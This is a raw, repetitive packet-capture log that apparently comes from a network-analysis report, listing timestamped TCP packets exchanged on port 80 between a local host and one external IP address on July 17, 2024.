                                                                            Jul 17, 2024 15:19:59.889740944 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.889767885 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.889780045 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.889796019 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.889822006 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.889826059 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.889849901 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.889877081 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.889884949 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.889936924 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.891393900 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.891438007 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.891464949 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.891499043 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.891556025 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.891582966 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.891624928 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.891629934 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.891654015 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.891694069 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.891735077 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.891779900 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.891797066 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.891805887 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.891833067 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.891859055 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.891863108 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.891887903 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.891931057 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.891947985 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.891964912 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.891978025 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.891993046 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892019033 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.892039061 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892055988 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.892066956 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892092943 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892096996 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.892121077 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892148972 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892152071 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.892175913 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892203093 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892205000 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.892231941 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892256021 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.892291069 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892317057 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892343044 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892347097 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.892370939 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892398119 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.892399073 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892427921 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892455101 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892457008 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.892497063 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892518044 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.892544031 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892571926 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892599106 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892610073 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.892627001 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892653942 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892658949 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.892683983 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892710924 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892714024 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.892740011 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892781019 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.892781973 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892812014 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892839909 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892839909 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.892865896 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892893076 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892895937 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.892920971 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892946959 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.892955065 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.893003941 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.900707006 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.900742054 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.900779009 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.900829077 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.900861979 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.900895119 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.900949001 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.900988102 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901020050 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901052952 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901087046 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901118994 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901170015 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901237965 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901272058 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901304960 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901336908 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901392937 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901448965 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901495934 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901530981 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901565075 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901597023 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901633978 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901685953 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901717901 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901751041 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901782990 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901818037 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901853085 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901885986 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901918888 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901952028 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.901987076 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.902014971 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.902472019 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.980911970 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.980943918 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.980957985 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.980986118 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.981002092 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.981017113 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.981030941 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.981106997 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.981154919 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.981223106 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.981700897 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.981725931 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.981740952 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.981792927 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.981864929 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.981879950 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.981894970 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.981910944 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.981913090 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.981928110 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.981939077 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.981981993 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.983666897 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.983722925 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.983737946 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.983768940 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.983803034 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.983817101 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.983830929 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.983844995 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.983850956 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.983881950 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.983925104 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.983939886 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.983953953 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.983969927 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.983973980 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.983984947 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.983999968 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984000921 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.984015942 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984036922 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.984065056 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.984262943 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984277964 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984292984 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984308004 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984323025 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984337091 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984342098 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.984353065 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984385014 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.984416962 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984441996 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984457016 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984467030 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.984472036 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984494925 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984510899 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984515905 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.984529018 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984546900 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.984585047 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.984700918 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984899044 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984914064 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984927893 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984935999 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984946966 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.984950066 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984965086 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984971046 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.984980106 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.984996080 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985011101 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985018015 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.985025883 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985039949 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985042095 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.985054970 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985069990 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985075951 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.985085011 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985100031 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985106945 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.985141993 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.985163927 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985177994 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985200882 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985214949 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985249043 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.985270023 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.985341072 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985353947 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985368013 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985383034 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985397100 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985399961 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.985430002 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.985502958 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985517025 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985532045 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985547066 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985558033 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.985562086 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985575914 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985582113 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.985590935 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.985658884 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.985968113 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.986017942 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.986031055 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.986032963 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.986063004 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.986071110 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.986084938 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.986119986 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.991569042 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.991617918 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.993786097 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.993840933 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.993854046 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.993856907 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.993915081 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.993947983 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.993963003 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.993977070 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.993993044 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994008064 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.994009972 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994050980 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.994132996 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994148016 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994160891 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994175911 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994184017 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.994191885 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994206905 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994216919 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.994221926 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994268894 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.994277954 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994473934 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994497061 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994510889 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994524002 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.994527102 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994541883 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994555950 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994559050 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.994570971 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994585037 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994599104 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994601965 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.994612932 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994626999 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.994627953 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994649887 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.994694948 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.994858027 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994873047 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994887114 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994901896 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994916916 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994923115 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.994931936 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994947910 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:19:59.994967937 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:19:59.995007038 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.073554993 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.073657036 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.073683977 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.073703051 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.073719978 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.073736906 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.073753119 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.073951960 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.073951960 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.074815989 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.074834108 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.074860096 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.074876070 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.074882030 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.074892044 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.074913025 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.074922085 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.074939013 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.074942112 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.075005054 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.076457024 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.076473951 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.076499939 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.076518059 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.076534033 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.076548100 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.076551914 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.076570034 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.076606035 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.076641083 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.076657057 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.076672077 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.076688051 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.076726913 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.076755047 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.076934099 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.077014923 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.077030897 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.077045918 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.077059984 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.077096939 CEST4970480192.168.2.538.180.60.246
                                                                            Jul 17, 2024 15:20:00.077166080 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.077183962 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.077198982 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.077215910 CEST804970438.180.60.246192.168.2.5
                                                                            Jul 17, 2024 15:20:00.077229977 CEST4970480192.168.2.538.180.60.246
